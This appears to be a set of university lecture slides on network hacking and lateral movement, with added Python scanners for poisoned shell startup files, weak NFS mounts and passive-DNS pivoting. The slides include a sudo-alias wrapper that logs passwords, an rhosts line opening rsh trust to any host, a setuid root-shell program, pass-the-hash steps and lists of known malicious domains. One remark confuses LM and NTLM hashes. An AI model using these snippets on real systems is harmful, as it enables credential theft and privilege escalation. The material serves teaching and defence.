Introduction to Information Security - Hacking Operations
nirkrak at post.tau.ac.il
Infosec15 at modprobe.net
Hacking Operations - Introduction
We now move from discussing the act of hacking a single machine or device to discussing the act of hacking and traversing through an entire network:
How organized networks are structured.
How hackers penetrate organized networks, usually administered by a single person or a team of administrators.
How hackers traverse the network to gain access to more resources and data.
Victim Network (diagram: vertical movement versus horizontal/lateral movement through the network)
First Target: Patient 0
Hackers will try to infect one computer, by different methods:
Chance / statistical luck!
Spear-phishing or human error.
Social engineering.
Pure hacking.
After infecting patient 0, hackers can attempt to launch different types of attacks, which can now depend on the internal network structure. By using information and access readily available on the hacked machine, hackers can attempt to laterally traverse the network.
Spearphishing
Spear phishing is an e-mail spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. Spear phishing attempts are not typically initiated by "random hackers" but are more likely to be conducted by perpetrators out for financial gain, trade secrets or military information.
-- http://searchsecurity.techtarget.com/definition/spear-phishing
An email I received
True story: I received this email last year. Can you spot the fail?
Network-wide Users
In an organized network, each user is given a single user/password credential; this password is used to authenticate the user against all machines in the network which the user should have access to.
Example: TAU. Your user and password are used to login to the *n?x machines as well as the video website.
If a computer used by one of the users is compromised, you can use his credentials, if gained, to login to all machines in the network.
Phishing for passwords
By local example: append an alias to the victim's .bashrc so that "sudo" runs a wrapper that records the typed password and then calls the real sudo.

    cat >> ~/.bashrc << 'EOF'
    alias sudo=/tmp/sudo.sh
    EOF
    cat > /tmp/sudo.sh << 'EOF'
    #!/bin/bash
    echo Enter password:
    read PASS
    echo $PASS > /tmp/.password.log
    sudo $1 $2 $3 $4 $5 $6
    EOF
    chmod +x /tmp/sudo.sh
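The defensive counterpart of the trick above is to look for it: a shell startup file that redefines sudo, su, ssh or passwd as an alias or function, especially one pointing into a world-writable directory, is exactly the artifact this attack leaves behind. The scanner below is an added example written for this page, not code from the lecture; the list of watched commands, the "untrusted" directories and the sample .bashrc are constructed assumptions.

```python
"""Scan shell startup files for aliases or functions that shadow credential-taking commands."""
import re
from pathlib import Path

# Commands whose redefinition in a startup file is a credential-theft red flag (assumption).
WATCHED = {"sudo", "su", "ssh", "passwd", "login", "kinit"}
# Directories a password-logging wrapper is typically dropped into (assumption).
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# alias sudo=/tmp/sudo.sh        alias sudo='...'
ALIAS_RE = re.compile(r"^\s*alias\s+([A-Za-z_][\w.-]*)\s*=\s*(.+)$")
# ssh() { ... }                  function ssh() { ... }
FUNC_RE = re.compile(r"^\s*(?:function\s+)?([A-Za-z_][\w.-]*)\s*\(\s*\)")


def find_shadowing(text, source="<input>"):
    """Return findings for every alias/function in `text` that shadows a WATCHED command."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):   # blank or commented-out lines never fire
            continue
        kind, m = "alias", ALIAS_RE.match(line)
        if not m:
            kind, m = "function", FUNC_RE.match(line)
        if not m or m.group(1) not in WATCHED:
            continue
        target = m.group(2) if kind == "alias" else line
        # A wrapper living in /tmp or similar is far more suspicious than one in /usr/local.
        severity = "high" if any(d in target for d in UNTRUSTED_DIRS) else "medium"
        findings.append({"source": source, "line": lineno, "name": m.group(1),
                         "kind": kind, "definition": line, "severity": severity})
    return findings


def scan_startup_files(home):
    """Scan the usual bash/zsh startup files under the home directory `home`."""
    home = Path(home)
    results = []
    for name in (".bashrc", ".bash_profile", ".profile", ".zshrc", ".bash_aliases"):
        path = home / name
        if path.is_file():
            results.extend(find_shadowing(path.read_text(errors="replace"), str(path)))
    return results


# Constructed sample: the poisoning shown on the slide, plus benign and commented-out entries.
SAMPLE_BASHRC = """\
# ~/.bashrc (constructed sample)
alias ll='ls -l'
alias sudo=/tmp/sudo.sh
ssh() { /usr/local/bin/ssh-wrapper "$@"; }
# alias su=/tmp/su.sh   (commented out: must not be reported)
"""

if __name__ == "__main__":
    for f in find_shadowing(SAMPLE_BASHRC, "~/.bashrc"):
        print(f"{f['severity']:6} {f['source']}:{f['line']} {f['kind']} {f['name']}: {f['definition']}")
```

Run it against the sample to see both hits; point scan_startup_files() at a real home directory to audit a host. It only covers aliases and shell functions: a modified PATH or a trojaned binary earlier in PATH needs a separate check.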
Sniffing for passwords
On Windows and other GUI based applications: key logging is used to record credentials being entered.
By actually sniffing the network, looking for telnet or other unencrypted communication methods where passwords are given in clear text format.
Sniffing the network traffic, looking for hashes which can later be cracked (more in the next slide).
Cracking hashed passwords
Gaining root access to /etc/shadow (previously /etc/passwd) leads to obtaining password hashes. John the Ripper or other password brute forcing techniques can then be used to retrieve the clear text password. The clear text password can be used to login to other computers. Users tend to use the same password for all computers and services, making it easy to gain access to other resources.
rlogin/rsh - history
Instead of logging in all the time, rlogin/rsh is used to authenticate a user without the need to enter a password. Once a connection is received from a trusted machine and it declares that the user remotely connecting is the user, the user automatically gains remote machine access with the same credentials.
Many hacking techniques employ:
    echo + + > ~root/.rhosts
This lets anybody from any host connect to the computer.
IP spoofing can be used to gain remote access as well. And this poor authentication is still being used in some dark corners of the world.
NFS v<4 also utilizes the same bad authentication by only comparing host/port (using identd) to identify the user.
Domain of computers
Unix NIS (Network Information Service)
The NIS (formerly known as Yellow Pages/YP) protocol is an old protocol used to sync passwords across a network. The NIS passwords are used to spread the credentials of a network of computers. From each of the servers in the network, access is given to a virtual directory which contains files such as passwd / shadow, etc.
By using shell:
    # ypcat passwd
You can get the network hashes of ALL users! In a secure network scheme this does not include the root account; however, local account access can be gained on all computers sharing the passwd file.
Pass the hash
Passing the hash is an original way of authentication for SSO (Single Sign On) which is easily exploitable. In Windows based systems, by simply passing the hash, a user is able to prove that he has the credentials needed to gain access to a resource (such as a network share).
Once hackers log in to a system, they can use locally existing network hashes to pass them to other systems by this process:
Gain local administrator privileges.
View locally logged in accounts.
Impersonate a user locally.
Use regular Windows operations to access network resources.
Gain more access and run remote code using psexec (Sysinternals utility).
LSASS
Slide was taken from WCE Internals by Amplia Security
Hash harvesting
On Windows computers, hashes are saved locally even after a logon session is terminated, in case access to the domain is no longer available. Several tools are in the wild used to do this hash harvesting, such as:
WCE - Windows Credential Editor
Pass The Hash Toolkit
gsecdump
Maybe more.
pwdump - hash dumping is also possible locally by dumping the SAM file (Security Accounts Manager).
WCE and its like:
Use ReadProcessMemory() to read the memory of LSASS for harvesting.
Inject code to implement the impersonation of users.
Side note, cracking NTLM hashes: NTLM aka NT LanMan (Lan Manager) hashes are DES based hashes of max 14 byte passwords: each 7 bytes of the password is hashed separately, making it easier: instead of 256^14 we get 256^7 * 2. Therefore a rainbow table can be easily created.
Unix NFS (Network File System)
The Unix NFS, comparable to Windows sharing, is a method of sharing directories by allowing others to locally mount a remote directory as if it was their own.
As we previously learned, using u+s and +x on a file that hands us root privileges, we are able to escalate our privileges:
    echo '#include <unistd.h>
    #include <stdlib.h>
    int main(){setuid(0);setgid(0);system("/bin/sh");return 0;}' > a.c
    gcc -o a a.c
Misconfigured NFS allows a mounted directory to contain suid files, therefore allowing root on one machine the ability to gain
http://packetstorm.wowhacker.com/mag/faith/faith8.txt
Shared binaries patching
Administrators or users share binaries on network shares / NFS (usually installation files). If those network shares are writable by a hacker, he can modify them and then wait for other users to execute them.
Example at TAU:
    user@nova:~$ mount | grep '/ type'
    netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr=132.67.192.53)
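The two NFS slides above describe one configuration problem from two sides: a share mounted rw without nosuid lets a setuid binary planted on it run with local root, and a share mounted rw lets anyone the server trusts patch the binaries others execute. The checker below parses mount(8) output of the form shown in the TAU example and flags those conditions. It is an added example written for this page, not the lecture's code; the sample mount lines are constructed (the first reproduces the slide's line, the others are invented for contrast), and the rule set is an assumption.

```python
"""Audit NFS mount options from `mount` output for the weaknesses discussed on the slides."""
import re

# "SRC on MNT type FSTYPE (opt1,opt2=val,...)" as printed by mount(8).
MOUNT_RE = re.compile(r"^(?P<src>\S+) on (?P<mnt>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)$")


def parse_mount_line(line):
    """Return {'src','mnt','fstype','opts'} for one mount line, or None if it does not parse."""
    m = MOUNT_RE.match(line.strip())
    if not m:
        return None
    opts = {}
    for opt in m.group("opts").split(","):
        key, _, value = opt.partition("=")
        opts[key] = value if value else True       # flags map to True, key=val keeps val
    return {"src": m.group("src"), "mnt": m.group("mnt"),
            "fstype": m.group("fstype"), "opts": opts}


def audit_nfs_mount(entry):
    """Return a list of issue strings for an NFS mount entry (empty for non-NFS or hardened mounts)."""
    issues = []
    if not entry["fstype"].startswith("nfs"):
        return issues
    opts = entry["opts"]
    if "nosuid" not in opts:
        issues.append("nosuid missing: setuid binaries on the share run with local privileges")
    if "rw" in opts and "ro" not in opts:
        issues.append("mounted rw: binaries on the share can be patched by anyone with write access")
    if opts.get("sec", "sys") == "sys":
        # AUTH_SYS: the server believes the uid/gid the client claims, like rsh trusted hosts.
        issues.append("sec=sys: server trusts client-reported uid/gid (no Kerberos)")
    vers = opts.get("vers")
    try:
        if vers is not None and float(vers) < 4:
            issues.append(f"vers={vers}: NFSv3 or older, host/port based trust")
    except ValueError:
        pass
    return issues


def audit_mount_output(text):
    """Audit every line of `mount` output; returns {mountpoint: [issues]} for mounts with issues."""
    report = {}
    for line in text.splitlines():
        entry = parse_mount_line(line)
        if entry is None:
            continue
        issues = audit_nfs_mount(entry)
        if issues:
            report[entry["mnt"]] = issues
    return report


# Constructed sample output: the slide's TAU mount, a hardened share, and a local disk.
SAMPLE_MOUNT_OUTPUT = """\
netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr=132.67.192.53)
fileserver.example:/export/software on /mnt/software type nfs4 (ro,nosuid,noexec,relatime,vers=4.2,sec=krb5p,addr=192.0.2.20)
/dev/sda1 on /boot type ext4 (rw,relatime)
"""

if __name__ == "__main__":
    for mnt, issues in audit_mount_output(SAMPLE_MOUNT_OUTPUT).items():
        print(mnt)
        for issue in issues:
            print("  -", issue)
```

Pipe real output in with `mount | python3 nfs_audit.py` after replacing the sample with sys.stdin.read(); the rules are the mount-side view only, and the matching server-side controls are root_squash and read-only exports.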
Hacking Infrastructure
These types of operations require: servers, domains, certificates. These things cost money and take a lot of effort to set up properly.
Infrastructure Examples
APT1 associated domains: hugesoft.org, ustvb.com, uszzcs.com, yuipcam.com, lmusic100.com, hvmetal.com, hkcastte.com, attnpower.com, ifexcel.com, bluecate.com, bpyy.com, skyswim.net, cslisten.com, bigish.net, ushongkong.org, chileexe77.com, issnbgkit.net, prgammerli.com, idirectech.com, phenixtvus.com, livemymsn.com, webservicesupdate.com, giftnews.org, nefastgame.net, todayusa.org
Zeus malware associated domains: dongen.info, fileserver03.com, frnty2073.net, glwpaks.com, gushante.net, hfajf1rnmzmasvuqiwdpchap.net, iafnajrpgjajqkgjhaifpzvnz.net, infinitysolutions.name, kesikelyaf.com, hidada.net
Careto - digital certificate with a fake owner
Nir Krakowski @ Metapacket
Infrastructure Example - APT1
Passive DNS Research Tool
Passive DNS
Security researchers have been collecting IP-host pairs for a few years now. This is done using instrumented programs installed by ISPs at their DNS servers. The host-IP pairs can be used to back-track hackers' resources.
For example, if hacker A uses domain bloblobfizzly.com, we can now blacklist it. We look it up in passive DNS to find IP pairs; we find it matches the following IPs: 8.8.8.8 and 8.8.4.4. We can look up in the same database for pairs with 8.8.4.4; we find it matches googfizzly.com and bij888rocks.com. Now, without much more information, you would educatedly guess that googfizzly.com is being used by the same hacker A, therefore we can blacklist it too.
Virustotal.com has a publicly query-able passive DNS database, but it is an incomplete one.
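The pivot described above (domain to its IPs, IPs to every other domain seen on them, repeat) is a breadth-first walk over a bipartite host/IP graph, and its main failure mode is pivoting through an address that hosts hundreds of unrelated sites (shared hosting, a CDN, a public resolver), which would blacklist innocent domains. The code below is an added example written for this page, not the lecture's tool or Virustotal's API; the passive DNS records are constructed (fictional names, TEST-NET addresses) and the hub threshold is an assumption.

```python
"""Passive-DNS pivot: expand a seed domain through shared IPs, skipping shared-hosting hubs."""
from collections import defaultdict, deque

# Constructed observations (hostname, ip). Names are fictional, IPs are from RFC 5737 TEST-NET.
PDNS_RECORDS = [
    ("bloblobfizzly.com", "192.0.2.10"),
    ("bloblobfizzly.com", "192.0.2.11"),
    ("googfizzly.com", "192.0.2.11"),
    ("bij888rocks.com", "192.0.2.11"),
    ("bij888rocks.com", "192.0.2.12"),
    ("dropzone-c2.example", "192.0.2.12"),
    # One shared-hosting address serving 40 unrelated tenants: must not be used as a pivot.
    *[(f"tenant{i}.example", "198.51.100.7") for i in range(40)],
    ("googfizzly.com", "198.51.100.7"),
]


def build_index(records):
    """Index (host, ip) pairs both ways so the walk can alternate host -> ip -> host."""
    host_to_ips, ip_to_hosts = defaultdict(set), defaultdict(set)
    for host, ip in records:
        host_to_ips[host].add(ip)
        ip_to_hosts[ip].add(host)
    return host_to_ips, ip_to_hosts


def pivot(seed, records, max_hops=2, hub_threshold=10):
    """Breadth-first expansion from `seed`.

    Returns (found, skipped_hubs): `found` maps each discovered domain to (hops, via_ip),
    with the seed at hop 0; `skipped_hubs` is the set of IPs that resolve for more than
    `hub_threshold` hostnames and were therefore treated as shared infrastructure.
    """
    host_to_ips, ip_to_hosts = build_index(records)
    found = {seed: (0, None)}
    skipped_hubs = set()
    queue = deque([(seed, 0)])
    while queue:
        host, hops = queue.popleft()
        if hops >= max_hops:
            continue
        for ip in sorted(host_to_ips[host]):
            neighbours = ip_to_hosts[ip]
            if len(neighbours) > hub_threshold:
                skipped_hubs.add(ip)          # too many unrelated names share this address
                continue
            for other in sorted(neighbours):
                if other not in found:
                    found[other] = (hops + 1, ip)
                    queue.append((other, hops + 1))
    return found, skipped_hubs


if __name__ == "__main__":
    found, hubs = pivot("bloblobfizzly.com", PDNS_RECORDS)
    for host, (hops, via) in sorted(found.items(), key=lambda kv: kv[1][0]):
        print(f"hop {hops}: {host}" + (f" (via {via})" if via else " (seed)"))
    print("skipped shared IPs:", sorted(hubs))
```

Each hop away from the seed weakens the inference, so max_hops should stay small, and anything found should be checked against first-seen/last-seen timestamps before it is blacklisted: a domain that used the address years before the attacker did is not the attacker's.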
Passive DNS
Questions?
Good Luck in the Test!
The test is hard. You will need to prepare a folder with this semester's material and bookmarks for subjects! Hopefully, there will be a 3 hour rehearsal exercise before the test. Feel free to drop by us with questions and ask for help.
No homework for you, come back in 1 year!